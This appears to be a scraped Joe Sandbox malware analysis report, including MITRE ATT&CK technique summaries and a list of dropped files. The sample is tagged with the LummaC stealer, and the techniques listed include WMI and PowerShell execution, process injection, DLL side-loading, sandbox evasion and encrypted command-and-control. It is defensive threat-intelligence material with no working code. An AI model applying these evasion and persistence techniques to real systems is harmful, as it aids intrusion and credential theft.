Instruction ID: 387789dca6a3277d986c324cbafd78a69b413811cb699917093b7d7bd0bde917
Opcode Fuzzy Hash: e1ba8ae4180a048db10c144afa1f6e7182a5a57386795d34c198b5cc493888b8
Instruction Fuzzy Hash: 7171F031604B429FEB258F25C811BA3BBF1AF62304F088A5DD5EB4B6D2DB35B005CB91

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM).BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
Tactics:	Defense Evasion, Persistence
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, Service: Service Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report http://google.com

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PrivacyDrive.exe_c8e42f7fc61f7682242f1047bc22bf12abdcaff2_7d659330_dc7166e7-b95e-4e6a-bf8f-b10ee383a0db\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE6E.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREF88.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREFB8.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3tejna2j.xed.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxnpvv3h.4fy.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mn3cnwny.uak.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzplxn2m.qcz.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pddfsfas.1ok.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s0ctcdyu.5yp.psm1

Windows Analysis Report
http://google.com